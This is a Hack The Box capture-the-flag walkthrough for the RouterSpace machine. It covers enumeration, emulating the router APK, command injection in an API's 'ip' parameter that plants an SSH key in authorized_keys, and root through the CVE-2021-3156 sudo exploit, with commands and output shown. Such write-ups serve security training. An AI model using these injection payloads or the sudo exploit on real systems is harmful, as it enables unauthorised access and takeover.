Routerspace - Hack The Box

RouterSpace is an easy-rated Linux machine from Hack The Box. It is very different from other boxes as we’re tasked with compromizing a router apk-file. Personally I found the hardest part to be finding the tools needed for the job. Once everything was setup properly the path from foothold to user to root took about 20 minutes. Looking back I learned a lot from this machine, and it was quite fun to own. Would recommend!
hackthebox
easy
linux
apk
anbox
adb
Author

0xPThree

Published

March 28, 2022

USER

Step 1

nmap:

┌──(void㉿void)-[/htb/routerspace]
└─$ nmap -p- 10.10.11.148     
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http


┌──(void㉿void)-[/htb/routerspace]
└─$ nmap -p22,80 -sCV 10.10.11.148
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-28 09:22 CEST
PORT   STATE SERVICE VERSION
22/tcp open  ssh     (protocol 2.0)
| fingerprint-strings: 
|   NULL: 
|_    SSH-2.0-RouterSpace Packet Filtering V1
| ssh-hostkey: 
|   3072 f4:e4:c8:0a:a6:af:66:93:af:69:5a:a9:bc:75:f9:0c (RSA)
|   256 7f:05:cd:8c:42:7b:a9:4a:b2:e6:35:2c:c4:59:78:02 (ECDSA)
|_  256 2f:d7:a8:8b:be:2d:10:b0:c9:b4:29:52:a8:94:24:78 (ED25519)
80/tcp open  http
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 200 OK
|     X-Powered-By: RouterSpace
|     X-Cdn: RouterSpace-77288
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 70
|     ETag: W/"46-abbFyEBeXh9CSfIO4E5mGzrEQI0"
|     Date: Mon, 28 Mar 2022 07:24:55 GMT
|     Connection: close
|     Suspicious activity detected !!! {RequestID: zLw qUksX fN OW A }
|   GetRequest: 
|     HTTP/1.1 200 OK
|     X-Powered-By: RouterSpace
|     X-Cdn: RouterSpace-62862
|     Accept-Ranges: bytes
|     Cache-Control: public, max-age=0
|     Last-Modified: Mon, 22 Nov 2021 11:33:57 GMT
|     ETag: W/"652c-17d476c9285"
|     Content-Type: text/html; charset=UTF-8
|     Content-Length: 25900
|     Date: Mon, 28 Mar 2022 07:24:54 GMT
|     Connection: close
|     <!doctype html>
|     <html class="no-js" lang="zxx">
|     <head>
|     <meta charset="utf-8">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>RouterSpace</title>
|     <meta name="description" content="">
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <link rel="stylesheet" href="css/bootstrap.min.css">
|     <link rel="stylesheet" href="css/owl.carousel.min.css">
|     <link rel="stylesheet" href="css/magnific-popup.css">
|     <link rel="stylesheet" href="css/font-awesome.min.css">
|     <link rel="stylesheet" href="css/themify-icons.css">
|   HTTPOptions: 
|     HTTP/1.1 200 OK
|     X-Powered-By: RouterSpace
|     X-Cdn: RouterSpace-79870
|     Allow: GET,HEAD,POST
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 13
|     ETag: W/"d-bMedpZYGrVt1nR4x+qdNZ2GqyRo"
|     Date: Mon, 28 Mar 2022 07:24:54 GMT
|     Connection: close
|     GET,HEAD,POST
|   RTSPRequest, X11Probe: 
|     HTTP/1.1 400 Bad Request
|_    Connection: close
|_http-title: RouterSpace
|_http-trane-info: Problem with XML parsing of /evox/about


[root:/git/htb/pandora]# nmap -sU --top-port=20 --open 10.10.11.136
PORT     STATE         SERVICE
67/udp   open|filtered dhcps
68/udp   open|filtered dhcpc
135/udp  open|filtered msrpc
137/udp  open|filtered netbios-ns
138/udp  open|filtered netbios-dgm
161/udp  open          snmp
520/udp  open|filtered route
4500/udp open|filtered nat-t-ike

dirb:

N/A

nikto:

+ Uncommon header 'x-cdn' found, with contents: RouterSpace-66427

ffuf:

$ ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://10.10.11.148/FUZZ -fs 50-95
css                     [Status: 301, Size: 173, Words: 7, Lines: 11]
fonts                   [Status: 301, Size: 177, Words: 7, Lines: 11]
img                     [Status: 301, Size: 173, Words: 7, Lines: 11]
js                      [Status: 301, Size: 171, Words: 7, Lines: 11]

$ ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://10.10.11.148/FUZZ.html -fs 50-95
contact                 [Status: 200, Size: 46439, Words: 10270, Lines: 358]

Step 2

Visit the website and we find multiple download buttons, all leading to RouterSpace.apk. Before we analyze the binary, we look on contact.html, while there we find features.html and Pricing.html, both gives some strange output.

$ curl -v http://10.10.11.148/features.html
> GET /features.html HTTP/1.1
> Host: 10.10.11.148

< HTTP/1.1 200 OK
< X-Powered-By: RouterSpace
< X-Cdn: RouterSpace-65007
< 
Suspicious activity detected !!! {RequestID: Z   73Mv z    F F i }

                                                                                                           
┌──(void㉿void)-[/htb/routerspace]
└─$ curl -v http://10.10.11.148/Pricing.html 
> GET /Pricing.html HTTP/1.1
> Host: 10.10.11.148

< HTTP/1.1 200 OK
< X-Powered-By: RouterSpace
< X-Cdn: RouterSpace-85902
< 
Suspicious activity detected !!! {RequestID: l2  Pmi   K lhy9 vL C yj6a  }

Unzip the .apk-file and start analyzing the data.. .. we find host name in apk-unpack/META-INF/CERT.RSA - routerspace.htb

Nothing more of value at first glance. As this is a easy box we should probably look for something obvious, like a public key for the SSH service, some API call or similar. Analyzing the data further with jd-gui and MobSF doesn’t give anything of value either.

Change approach and try to emulate the apk using Anbox and adb:

Install (if "ls -1 /dev/{ashmem,binder}" gives not found):
$ apt install dkms linux-headers-amd64
$ git clone https://github.com/anbox/anbox-modules.git
$ sudo ./INSTALL.sh
$ sudo modprobe ashmem_linux && sudo modprobe binder_linux
$ ls -1 /dev/{ashmem,binder}

$ sudo apt install snapd
$ service snapd start
$ sudo snap install --devmode --beta anbox

$ sudo apt install android-tools-adb
$ adb devices
 * daemon not running; starting now at tcp:5037
 * daemon started successfully
 List of devices attached
$ anbox launch --package=org.anbox.appmgr
$ adb devices                            
 List of devices attached
 emulator-5558  device
$ adb install RouterSpace.apk            
 Performing Streamed Install
 Success
$ anbox.appmgr 


If not able to enable proxy, kill all adb and anbox servies and try again.
$ kill ...
$ adb devices
$ adb shell settings put global http_proxy 192.168.101.187:8181
$ anbox.appmgr

Burp Proxy Settings:

We are now able to capture the Check Status API call in Burp.


Step 3

We have one data parameter to play with, ip, and we quickly find that it’s not sanitized and vulnerable for command injection.

Generate a new SSH key, inject it and login as user Paul. Grab user.txt.

┌──(void㉿void)-[/htb/routerspace]
└─$ ssh-keygen -t rsa -b 4096 -f paul-id_rsa

┌──(void㉿void)-[/htb/routerspace]
└─$ cat paul-id_rsa.pub  
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC [... snip ...]

Inject the payload in Burp Repeater: 
mkdir -p /home/paul/.ssh && echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC [... snip ...]' > /home/paul/.ssh/authorized_keys

┌──(void㉿void)-[/htb/routerspace]
└─$ ssh paul@routerspace.htb -i paul-id_rsa

paul@routerspace:~$ id && cat user.txt 
uid=1001(paul) gid=1001(paul) groups=1001(paul)
e8f2d33e776f9e917eeab833f5dff7a6

ROOT

Step 1

With some quick manual enumeration we find that the sudo version is old and vulnerable to CVE-2021-3156.

paul@routerspace:~$ sudo --version
Sudo version 1.8.31
Sudoers policy plugin version 1.8.31
Sudoers file grammar version 46
Sudoers I/O plugin version 1.8.31

paul@routerspace:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
author: "0xPThree"
description:    Ubuntu 20.04.3 LTS
Release:    20.04
Codename:   focal

┌──(void㉿void)-[/htb/routerspace]
└─$ scp -i paul-id_rsa -rp sudo-exploit-main paul@routerspace.htb:/dev/shm                                                                                1 ⨯
sice.c                                                                                                                      100%  176     5.5KB/s   00:00    
README.md                                                                                                                   100%  234     7.6KB/s   00:00    
Makefile                                                                                                                    100%   95     3.0KB/s   00:00    
exploit.c                                                                                                                   100% 2651    82.9KB/s   00:00 

paul@routerspace:/dev/shm/sudo-exploit-main$ make
gcc exploit.c -o exploit
exploit.c: In function ‘main’:
exploit.c:75:5: warning: implicit declaration of function ‘execve’ [-Wimplicit-function-declaration]
   75 |     execve(argv[0], argv, env);
      |     ^~~~~~
mkdir libnss_X
gcc -g -fPIC -shared sice.c -o libnss_X/X.so.2

paul@routerspace:/dev/shm/sudo-exploit-main$ ./exploit 
root@routerspace:/dev/shm/sudo-exploit-main# id && cat /root/root.txt
uid=0(root) gid=1001(paul) groups=1001(paul)
3d6de1c1362a1d59bd130fd45d895e45

References

Install Anbox: https://docs.anbox.io/userguide/install_kernel_modules.html

CVE-2021-3156: https://github.com/redhawkeye/sudo-exploit